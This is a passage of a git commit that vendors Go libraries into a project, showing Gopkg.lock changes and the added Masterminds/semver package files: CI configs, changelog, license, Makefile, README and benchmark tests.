create mode 100644 vendor/github.com/docker/docker/runconfig/config_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/config_unix.go create mode 100644 vendor/github.com/docker/docker/runconfig/config_windows.go create mode 100644 vendor/github.com/docker/docker/runconfig/errors.go create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_unix.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_windows.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile_test.go create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env create mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env create mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label create mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts.go create mode 
100644 vendor/github.com/docker/docker/runconfig/opts/opts_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/runtime.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/throttledevice.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/ulimit.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/weightdevice.go create mode 100644 vendor/github.com/docker/docker/utils/debug.go create mode 100644 vendor/github.com/docker/docker/utils/debug_test.go create mode 100644 vendor/github.com/docker/docker/utils/names.go create mode 100644 vendor/github.com/docker/docker/utils/process_unix.go create mode 100644 vendor/github.com/docker/docker/utils/process_windows.go create mode 100644 vendor/github.com/docker/docker/utils/templates/templates.go create mode 100644 vendor/github.com/docker/docker/utils/templates/templates_test.go create mode 100644 vendor/github.com/docker/docker/utils/utils.go create mode 100644 vendor/github.com/docker/docker/utils/utils_test.go create mode 100644 vendor/github.com/docker/docker/vendor.conf create mode 100644 vendor/github.com/docker/docker/volume/drivers/adapter.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/extpoint.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/extpoint_test.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/proxy.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/proxy_test.go create mode 100644 vendor/github.com/docker/docker/volume/local/local.go create mode 100644 vendor/github.com/docker/docker/volume/local/local_test.go create mode 100644 vendor/github.com/docker/docker/volume/local/local_unix.go create mode 100644 
vendor/github.com/docker/docker/volume/local/local_windows.go create mode 100644 vendor/github.com/docker/docker/volume/store/db.go create mode 100644 vendor/github.com/docker/docker/volume/store/errors.go create mode 100644 vendor/github.com/docker/docker/volume/store/restore.go create mode 100644 vendor/github.com/docker/docker/volume/store/store.go create mode 100644 vendor/github.com/docker/docker/volume/store/store_test.go create mode 100644 vendor/github.com/docker/docker/volume/store/store_unix.go create mode 100644 vendor/github.com/docker/docker/volume/store/store_windows.go create mode 100644 vendor/github.com/docker/docker/volume/testutils/testutils.go create mode 100644 vendor/github.com/docker/docker/volume/validate.go create mode 100644 vendor/github.com/docker/docker/volume/validate_test.go create mode 100644 vendor/github.com/docker/docker/volume/validate_test_unix.go create mode 100644 vendor/github.com/docker/docker/volume/validate_test_windows.go create mode 100644 vendor/github.com/docker/docker/volume/volume.go create mode 100644 vendor/github.com/docker/docker/volume/volume_copy.go create mode 100644 vendor/github.com/docker/docker/volume/volume_copy_unix.go create mode 100644 vendor/github.com/docker/docker/volume/volume_copy_windows.go create mode 100644 vendor/github.com/docker/docker/volume/volume_linux.go create mode 100644 vendor/github.com/docker/docker/volume/volume_linux_test.go create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux.go create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go create mode 100644 vendor/github.com/docker/docker/volume/volume_test.go create mode 100644 vendor/github.com/docker/docker/volume/volume_unix.go create mode 100644 vendor/github.com/docker/docker/volume/volume_unsupported.go create mode 100644 
vendor/github.com/docker/docker/volume/volume_windows.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/.gitignore create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/.travis.yml create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/LICENSE create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/README.md create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/date.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/date_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/error.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/error_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/example_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/in.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/in_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/is/rules.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/length.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/length_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/match.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/match_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/minmax.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/not_nil.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/required.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/required_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/string.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/string_test.go create mode 100644 
vendor/github.com/go-ozzo/ozzo-validation/struct.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/struct_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/util.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/util_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/validation.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/validation_test.go create mode 100644 vendor/github.com/google/uuid/.travis.yml create mode 100644 vendor/github.com/google/uuid/CONTRIBUTING.md create mode 100644 vendor/github.com/google/uuid/CONTRIBUTORS create mode 100644 vendor/github.com/google/uuid/LICENSE create mode 100644 vendor/github.com/google/uuid/README.md create mode 100644 vendor/github.com/google/uuid/dce.go create mode 100644 vendor/github.com/google/uuid/doc.go create mode 100644 vendor/github.com/google/uuid/hash.go create mode 100644 vendor/github.com/google/uuid/json_test.go create mode 100644 vendor/github.com/google/uuid/marshal.go create mode 100644 vendor/github.com/google/uuid/node.go create mode 100644 vendor/github.com/google/uuid/seq_test.go create mode 100644 vendor/github.com/google/uuid/sql.go create mode 100644 vendor/github.com/google/uuid/sql_test.go create mode 100644 vendor/github.com/google/uuid/time.go create mode 100644 vendor/github.com/google/uuid/util.go create mode 100644 vendor/github.com/google/uuid/uuid.go create mode 100644 vendor/github.com/google/uuid/uuid_test.go create mode 100644 vendor/github.com/google/uuid/version1.go create mode 100644 vendor/github.com/google/uuid/version4.go create mode 100644 vendor/github.com/huandu/xstrings/.gitignore create mode 100644 vendor/github.com/huandu/xstrings/.travis.yml create mode 100644 vendor/github.com/huandu/xstrings/CONTRIBUTING.md create mode 100644 vendor/github.com/huandu/xstrings/LICENSE create mode 100644 vendor/github.com/huandu/xstrings/README.md create mode 100644 vendor/github.com/huandu/xstrings/common.go 
create mode 100644 vendor/github.com/huandu/xstrings/convert.go create mode 100644 vendor/github.com/huandu/xstrings/convert_test.go create mode 100644 vendor/github.com/huandu/xstrings/count.go create mode 100644 vendor/github.com/huandu/xstrings/count_test.go create mode 100644 vendor/github.com/huandu/xstrings/doc.go create mode 100644 vendor/github.com/huandu/xstrings/format.go create mode 100644 vendor/github.com/huandu/xstrings/format_test.go create mode 100644 vendor/github.com/huandu/xstrings/manipulate.go create mode 100644 vendor/github.com/huandu/xstrings/manipulate_test.go create mode 100644 vendor/github.com/huandu/xstrings/translate.go create mode 100644 vendor/github.com/huandu/xstrings/translate_test.go create mode 100644 vendor/github.com/huandu/xstrings/util_test.go create mode 100644 vendor/github.com/imdario/mergo/.gitignore create mode 100644 vendor/github.com/imdario/mergo/.travis.yml create mode 100644 vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md create mode 100644 vendor/github.com/imdario/mergo/LICENSE create mode 100644 vendor/github.com/imdario/mergo/README.md create mode 100644 vendor/github.com/imdario/mergo/doc.go create mode 100644 vendor/github.com/imdario/mergo/issue17_test.go create mode 100644 vendor/github.com/imdario/mergo/issue23_test.go create mode 100644 vendor/github.com/imdario/mergo/issue33_test.go create mode 100644 vendor/github.com/imdario/mergo/issue38_test.go create mode 100644 vendor/github.com/imdario/mergo/issue50_test.go create mode 100644 vendor/github.com/imdario/mergo/issue52_test.go create mode 100644 vendor/github.com/imdario/mergo/issue61_test.go create mode 100644 vendor/github.com/imdario/mergo/issue64_test.go create mode 100644 vendor/github.com/imdario/mergo/issue66_test.go create mode 100644 vendor/github.com/imdario/mergo/map.go create mode 100644 vendor/github.com/imdario/mergo/merge.go create mode 100644 vendor/github.com/imdario/mergo/merge_appendslice_test.go create mode 100644 
vendor/github.com/imdario/mergo/merge_test.go create mode 100644 vendor/github.com/imdario/mergo/mergo.go create mode 100644 vendor/github.com/imdario/mergo/mergo_test.go create mode 100644 vendor/github.com/imdario/mergo/pr80_test.go create mode 100644 vendor/github.com/imdario/mergo/pr81_test.go create mode 100644 vendor/github.com/imdario/mergo/testdata/license.yml create mode 100644 vendor/github.com/imdario/mergo/testdata/thing.yml diff --git a/Gopkg.lock b/Gopkg.lock index 19c0ad71bb..dc144cf25f 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -1,6 +1,30 @@ # This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'. +[[projects]] + name = "github.com/Masterminds/semver" + packages = ["."] + revision = "c7af12943936e8c39859482e61f0574c2fd7fc75" + version = "v1.4.2" + +[[projects]] + name = "github.com/Masterminds/sprig" + packages = ["."] + revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c" + version = "v2.15.0" + +[[projects]] + name = "github.com/Sirupsen/logrus" + packages = ["."] + revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc" + version = "v1.0.5" + +[[projects]] + name = "github.com/aokoli/goutils" + packages = ["."] + revision = "3391d3790d23d03408670993e957e8f408993c34" + version = "v1.0.1" + [[projects]] name = "github.com/boltdb/bolt" packages = ["."] @@ -13,6 +37,18 @@ revision = "48dbb65d7bd5c74ab50d53d04c949f20e3d14944" version = "1.0" +[[projects]] + name = "github.com/davecgh/go-spew" + packages = ["spew"] + revision = "346938d642f2ec3594ed81d874461961cd0faa76" + version = "v1.1.0" + +[[projects]] + name = "github.com/docker/docker" + packages = ["pkg/fileutils"] + revision = "092cba3727bb9b4a2f0e922cd6c0f93ea270e363" + version = "v1.13.1" + [[projects]] branch = "master" name = "github.com/elazarl/go-bindata-assetfs" @@ -37,6 +73,12 @@ revision = "629574ca2a5df945712d3079857300b5e4da0236" version = "v1.4.2" +[[projects]] + name = "github.com/go-ozzo/ozzo-validation" + packages = ["."] + revision = 
"85dcd8368eba387e65a03488b003e233994e87e9" + version = "v3.3" + [[projects]] name = "github.com/go-test/deep" packages = ["."] @@ -55,6 +97,12 @@ packages = ["query"] revision = "53e6ce116135b80d037921a7fdd5138cf32d7a8a" +[[projects]] + name = "github.com/google/uuid" + packages = ["."] + revision = "064e2069ce9c359c118179501254f67d7d37ba24" + version = "0.2" + [[projects]] name = "github.com/gorilla/context" packages = ["."] @@ -101,6 +149,18 @@ ] revision = "68e816d1c783414e79bc65b3994d9ab6b0a722ab" +[[projects]] + name = "github.com/huandu/xstrings" + packages = ["."] + revision = "2bf18b218c51864a87384c06996e40ff9dcff8e1" + version = "v1.0.0" + +[[projects]] + name = "github.com/imdario/mergo" + packages = ["."] + revision = "9316a62528ac99aaecb4e47eadd6dc8aa6533d58" + version = "v0.3.5" + [[projects]] name = "github.com/inconshreveable/mousetrap" packages = ["."] @@ -248,7 +308,11 @@ [[projects]] branch = "master" name = "golang.org/x/crypto" - packages = ["ssh/terminal"] + packages = [ + "pbkdf2", + "scrypt", + "ssh/terminal" + ] revision = "7d9177d70076375b9a59c8fde23d52d9c4a7ecd5" [[projects]] @@ -288,6 +352,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "6e38170b3ac78890d7f3af87171bc9ccf81083b5196342b2f5acea10125872bd" + inputs-digest = "148489fcbc8e0f37944adc0eb2f9f187995790c5107188e9f4bebb79f7989434" solver-name = "gps-cdcl" solver-version = 1 diff --git a/vendor/github.com/Masterminds/semver/.travis.yml b/vendor/github.com/Masterminds/semver/.travis.yml new file mode 100644 index 0000000000..3d9ebadb93 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/.travis.yml @@ -0,0 +1,27 @@ +language: go + +go: + - 1.6.x + - 1.7.x + - 1.8.x + - 1.9.x + - 1.10.x + - tip + +# Setting sudo access to false will let Travis CI use containers rather than +# VMs to run the tests. 
For more details see: +# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/ +# - http://docs.travis-ci.com/user/workers/standard-infrastructure/ +sudo: false + +script: + - make setup + - make test + +notifications: + webhooks: + urls: + - https://webhooks.gitter.im/e/06e3328629952dabe3e0 + on_success: change # options: [always|never|change] default: always + on_failure: always # options: [always|never|change] default: always + on_start: never # options: [always|never|change] default: always diff --git a/vendor/github.com/Masterminds/semver/CHANGELOG.md b/vendor/github.com/Masterminds/semver/CHANGELOG.md new file mode 100644 index 0000000000..b888e20aba --- /dev/null +++ b/vendor/github.com/Masterminds/semver/CHANGELOG.md @@ -0,0 +1,86 @@ +# 1.4.2 (2018-04-10) + +## Changed +- #72: Updated the docs to point to vert for a console appliaction +- #71: Update the docs on pre-release comparator handling + +## Fixed +- #70: Fix the handling of pre-releases and the 0.0.0 release edge case + +# 1.4.1 (2018-04-02) + +## Fixed +- Fixed #64: Fix pre-release precedence issue (thanks @uudashr) + +# 1.4.0 (2017-10-04) + +## Changed +- #61: Update NewVersion to parse ints with a 64bit int size (thanks @zknill) + +# 1.3.1 (2017-07-10) + +## Fixed +- Fixed #57: number comparisons in prerelease sometimes inaccurate + +# 1.3.0 (2017-05-02) + +## Added +- #45: Added json (un)marshaling support (thanks @mh-cbon) +- Stability marker. See https://masterminds.github.io/stability/ + +## Fixed +- #51: Fix handling of single digit tilde constraint (thanks @dgodd) + +## Changed +- #55: The godoc icon moved from png to svg + +# 1.2.3 (2017-04-03) + +## Fixed +- #46: Fixed 0.x.x and 0.0.x in constraints being treated as * + +# Release 1.2.2 (2016-12-13) + +## Fixed +- #34: Fixed issue where hyphen range was not working with pre-release parsing. 
+ +# Release 1.2.1 (2016-11-28) + +## Fixed +- #24: Fixed edge case issue where constraint "> 0" does not handle "0.0.1-alpha" + properly. + +# Release 1.2.0 (2016-11-04) + +## Added +- #20: Added MustParse function for versions (thanks @adamreese) +- #15: Added increment methods on versions (thanks @mh-cbon) + +## Fixed +- Issue #21: Per the SemVer spec (section 9) a pre-release is unstable and + might not satisfy the intended compatibility. The change here ignores pre-releases + on constraint checks (e.g., ~ or ^) when a pre-release is not part of the + constraint. For example, `^1.2.3` will ignore pre-releases while + `^1.2.3-alpha` will include them. + +# Release 1.1.1 (2016-06-30) + +## Changed +- Issue #9: Speed up version comparison performance (thanks @sdboyer) +- Issue #8: Added benchmarks (thanks @sdboyer) +- Updated Go Report Card URL to new location +- Updated Readme to add code snippet formatting (thanks @mh-cbon) +- Updating tagging to v[SemVer] structure for compatibility with other tools. + +# Release 1.1.0 (2016-03-11) + +- Issue #2: Implemented validation to provide reasons a versions failed a + constraint. + +# Release 1.0.1 (2015-12-31) + +- Fixed #1: * constraint failing on valid versions. 
+ +# Release 1.0.0 (2015-10-20) + +- Initial release diff --git a/vendor/github.com/Masterminds/semver/LICENSE.txt b/vendor/github.com/Masterminds/semver/LICENSE.txt new file mode 100644 index 0000000000..0da4aeadb0 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/LICENSE.txt @@ -0,0 +1,20 @@ +The Masterminds +Copyright (C) 2014-2015, Matt Butcher and Matt Farina + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. 
diff --git a/vendor/github.com/Masterminds/semver/Makefile b/vendor/github.com/Masterminds/semver/Makefile new file mode 100644 index 0000000000..a7a1b4e36d --- /dev/null +++ b/vendor/github.com/Masterminds/semver/Makefile @@ -0,0 +1,36 @@ +.PHONY: setup +setup: + go get -u gopkg.in/alecthomas/gometalinter.v1 + gometalinter.v1 --install + +.PHONY: test +test: validate lint + @echo "==> Running tests" + go test -v + +.PHONY: validate +validate: + @echo "==> Running static validations" + @gometalinter.v1 \ + --disable-all \ + --enable deadcode \ + --severity deadcode:error \ + --enable gofmt \ + --enable gosimple \ + --enable ineffassign \ + --enable misspell \ + --enable vet \ + --tests \ + --vendor \ + --deadline 60s \ + ./... || exit_code=1 + +.PHONY: lint +lint: + @echo "==> Running linters" + @gometalinter.v1 \ + --disable-all \ + --enable golint \ + --vendor \ + --deadline 60s \ + ./... || : diff --git a/vendor/github.com/Masterminds/semver/README.md b/vendor/github.com/Masterminds/semver/README.md new file mode 100644 index 0000000000..3e934ed71e --- /dev/null +++ b/vendor/github.com/Masterminds/semver/README.md @@ -0,0 +1,165 @@ +# SemVer + +The `semver` package provides the ability to work with [Semantic Versions](http://semver.org) in Go. 
Specifically it provides the ability to: + +* Parse semantic versions +* Sort semantic versions +* Check if a semantic version fits within a set of constraints +* Optionally work with a `v` prefix + +[![Stability: +Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html) +[![Build Status](https://travis-ci.org/Masterminds/semver.svg)](https://travis-ci.org/Masterminds/semver) [![Build status](https://ci.appveyor.com/api/projects/status/jfk66lib7hb985k8/branch/master?svg=true&passingText=windows%20build%20passing&failingText=windows%20build%20failing)](https://ci.appveyor.com/project/mattfarina/semver/branch/master) [![GoDoc](https://godoc.org/github.com/Masterminds/semver?status.svg)](https://godoc.org/github.com/Masterminds/semver) [![Go Report Card](https://goreportcard.com/badge/github.com/Masterminds/semver)](https://goreportcard.com/report/github.com/Masterminds/semver) + +## Parsing Semantic Versions + +To parse a semantic version use the `NewVersion` function. For example, + +```go + v, err := semver.NewVersion("1.2.3-beta.1+build345") +``` + +If there is an error the version wasn't parseable. The version object has methods +to get the parts of the version, compare it to other versions, convert the +version back into a string, and get the original string. For more details +please see the [documentation](https://godoc.org/github.com/Masterminds/semver). + +## Sorting Semantic Versions + +A set of versions can be sorted using the [`sort`](https://golang.org/pkg/sort/) +package from the standard library. 
For example, + +```go + raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",} + vs := make([]*semver.Version, len(raw)) + for i, r := range raw { + v, err := semver.NewVersion(r) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + vs[i] = v + } + + sort.Sort(semver.Collection(vs)) +``` + +## Checking Version Constraints + +Checking a version against version constraints is one of the most featureful +parts of the package. + +```go + c, err := semver.NewConstraint(">= 1.2.3") + if err != nil { + // Handle constraint not being parseable. + } + + v, _ := semver.NewVersion("1.3") + if err != nil { + // Handle version not being parseable. + } + // Check if the version meets the constraints. The a variable will be true. + a := c.Check(v) +``` + +## Basic Comparisons + +There are two elements to the comparisons. First, a comparison string is a list +of comma separated and comparisons. These are then separated by || separated or +comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a +comparison that's greater than or equal to 1.2 and less than 3.0.0 or is +greater than or equal to 4.2.3. + +The basic comparisons are: + +* `=`: equal (aliased to no operator) +* `!=`: not equal +* `>`: greater than +* `<`: less than +* `>=`: greater than or equal to +* `<=`: less than or equal to + +_Note, according to the Semantic Version specification pre-releases may not be +API compliant with their release counterpart. It says,_ + +> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._ + +_SemVer comparisons without a pre-release value will skip pre-release versions. +For example, `>1.2.3` will skip pre-releases when looking at a list of values +while `>1.2.3-alpha.1` will evaluate pre-releases._ + +## Hyphen Range Comparisons + +There are multiple methods to handle ranges and the first is hyphens ranges. 
+These look like: + +* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5` +* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5` + +## Wildcards In Comparisons + +The `x`, `X`, and `*` characters can be used as a wildcard character. This works +for all comparison operators. When used on the `=` operator it falls +back to the pack level comparison (see tilde below). For example, + +* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` +* `>= 1.2.x` is equivalent to `>= 1.2.0` +* `<= 2.x` is equivalent to `<= 3` +* `*` is equivalent to `>= 0.0.0` + +## Tilde Range Comparisons (Patch) + +The tilde (`~`) comparison operator is for patch level ranges when a minor +version is specified and major level changes when the minor number is missing. +For example, + +* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0` +* `~1` is equivalent to `>= 1, < 2` +* `~2.3` is equivalent to `>= 2.3, < 2.4` +* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` +* `~1.x` is equivalent to `>= 1, < 2` + +## Caret Range Comparisons (Major) + +The caret (`^`) comparison operator is for major level changes. This is useful +when comparisons of API versions as a major change is API breaking. For example, + +* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0` +* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0` +* `^2.3` is equivalent to `>= 2.3, < 3` +* `^2.x` is equivalent to `>= 2.0.0, < 3` + +# Validation + +In addition to testing a version against a constraint, a version can be validated +against a constraint. When validation fails a slice of errors containing why a +version didn't meet the constraint is returned. For example, + +```go + c, err := semver.NewConstraint("<= 1.2.3, >= 1.4") + if err != nil { + // Handle constraint not being parseable. + } + + v, _ := semver.NewVersion("1.3") + if err != nil { + // Handle version not being parseable. + } + + // Validate a version against a constraint. 
+ a, msgs := c.Validate(v) + // a is false + for _, m := range msgs { + fmt.Println(m) + + // Loops over the errors which would read + // "1.3 is greater than 1.2.3" + // "1.3 is less than 1.4" + } +``` + +# Contribute + +If you find an issue or want to contribute please file an [issue](https://github.com/Masterminds/semver/issues) +or [create a pull request](https://github.com/Masterminds/semver/pulls). diff --git a/vendor/github.com/Masterminds/semver/appveyor.yml b/vendor/github.com/Masterminds/semver/appveyor.yml new file mode 100644 index 0000000000..b2778df15a --- /dev/null +++ b/vendor/github.com/Masterminds/semver/appveyor.yml @@ -0,0 +1,44 @@ +version: build-{build}.{branch} + +clone_folder: C:\gopath\src\github.com\Masterminds\semver +shallow_clone: true + +environment: + GOPATH: C:\gopath + +platform: + - x64 + +install: + - go version + - go env + - go get -u gopkg.in/alecthomas/gometalinter.v1 + - set PATH=%PATH%;%GOPATH%\bin + - gometalinter.v1.exe --install + +build_script: + - go install -v ./... + +test_script: + - "gometalinter.v1 \ + --disable-all \ + --enable deadcode \ + --severity deadcode:error \ + --enable gofmt \ + --enable gosimple \ + --enable ineffassign \ + --enable misspell \ + --enable vet \ + --tests \ + --vendor \ + --deadline 60s \ + ./... || exit_code=1" + - "gometalinter.v1 \ + --disable-all \ + --enable golint \ + --vendor \ + --deadline 60s \ + ./... 
|| :" + - go test -v + +deploy: off diff --git a/vendor/github.com/Masterminds/semver/benchmark_test.go b/vendor/github.com/Masterminds/semver/benchmark_test.go new file mode 100644 index 0000000000..58a5c289f4 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/benchmark_test.go @@ -0,0 +1,157 @@ +package semver_test + +import ( + "testing" + + "github.com/Masterminds/semver" +) + +/* Constraint creation benchmarks */ + +func benchNewConstraint(c string, b *testing.B) { + for i := 0; i < b.N; i++ { + semver.NewConstraint(c) + } +} + +func BenchmarkNewConstraintUnary(b *testing.B) { + benchNewConstraint("=2.0", b) +} + +func BenchmarkNewConstraintTilde(b *testing.B) { + benchNewConstraint("~2.0.0", b) +} + +func BenchmarkNewConstraintCaret(b *testing.B) { + benchNewConstraint("^2.0.0", b) +} + +func BenchmarkNewConstraintWildcard(b *testing.B) { + benchNewConstraint("1.x", b) +} + +func BenchmarkNewConstraintRange(b *testing.B) { + benchNewConstraint(">=2.1.x, <3.1.0", b) +} + +func BenchmarkNewConstraintUnion(b *testing.B) { + benchNewConstraint("~2.0.0 || =3.1.0", b) +} + +/* Check benchmarks */ + +func benchCheckVersion(c, v string, b *testing.B) { + version, _ := semver.NewVersion(v) + constraint, _ := semver.NewConstraint(c) + + for i := 0; i < b.N; i++ { + constraint.Check(version) + } +} + +func BenchmarkCheckVersionUnary(b *testing.B) { + benchCheckVersion("=2.0", "2.0.0", b) +} + +func BenchmarkCheckVersionTilde(b *testing.B) { + benchCheckVersion("~2.0.0", "2.0.5", b) +} + +func BenchmarkCheckVersionCaret(b *testing.B) { + benchCheckVersion("^2.0.0", "2.1.0", b) +} + +func BenchmarkCheckVersionWildcard(b *testing.B) { + benchCheckVersion("1.x", "1.4.0", b) +} + +func BenchmarkCheckVersionRange(b *testing.B) { + benchCheckVersion(">=2.1.x, <3.1.0", "2.4.5", b) +} + +func BenchmarkCheckVersionUnion(b *testing.B) { + benchCheckVersion("~2.0.0 || =3.1.0", "3.1.0", b) +} + +func benchValidateVersion(c, v string, b *testing.B) { + version, _ := 
semver.NewVersion(v) + constraint, _ := semver.NewConstraint(c) + + for i := 0; i < b.N; i++ { + constraint.Validate(version) + } +} + +/* Validate benchmarks, including fails */ + +func BenchmarkValidateVersionUnary(b *testing.B) { + benchValidateVersion("=2.0", "2.0.0", b) +} + +func BenchmarkValidateVersionUnaryFail(b *testing.B) { + benchValidateVersion("=2.0", "2.0.1", b) +} + +func BenchmarkValidateVersionTilde(b *testing.B) { + benchValidateVersion("~2.0.0", "2.0.5", b) +} + +func BenchmarkValidateVersionTildeFail(b *testing.B) { + benchValidateVersion("~2.0.0", "1.0.5", b) +} + +func BenchmarkValidateVersionCaret(b *testing.B) { + benchValidateVersion("^2.0.0", "2.1.0", b) +} + +func BenchmarkValidateVersionCaretFail(b *testing.B) { + benchValidateVersion("^2.0.0", "4.1.0", b) +} + +func BenchmarkValidateVersionWildcard(b *testing.B) { + benchValidateVersion("1.x", "1.4.0", b) +} + +func BenchmarkValidateVersionWildcardFail(b *testing.B) { + benchValidateVersion("1.x", "2.4.0", b) +} + +func BenchmarkValidateVersionRange(b *testing.B) { + benchValidateVersion(">=2.1.x, <3.1.0", "2.4.5", b) +} + +func BenchmarkValidateVersionRangeFail(b *testing.B) { + benchValidateVersion(">=2.1.x, <3.1.0", "1.4.5", b) +} + +func BenchmarkValidateVersionUnion(b *testing.B) { + benchValidateVersion("~2.0.0 || =3.1.0", "3.1.0", b) +} + +func BenchmarkValidateVersionUnionFail(b *testing.B) { + benchValidateVersion("~2.0.0 || =3.1.0", "3.1.1", b) +} + +/* Version creation benchmarks */ + +func benchNewVersion(v string, b *testing.B) { + for i := 0; i < b.N; i++ { + semver.NewVersion(v) + } +} + +func BenchmarkNewVersionSimple(b *testing.B) { + benchNewVersion("1.0.0", b) +} + +func BenchmarkNewVersionPre(b *testing.B) { + benchNewVersion("1.0.0-alpha", b) +} + +func BenchmarkNewVersionMeta(b *testing.B) { + benchNewVersion("1.0.0+metadata", b) +} + +func BenchmarkNewVersionMetaDash(b *testing.B) { + benchNewVersion("1.0.0+metadata-dash", b) +} diff --git 
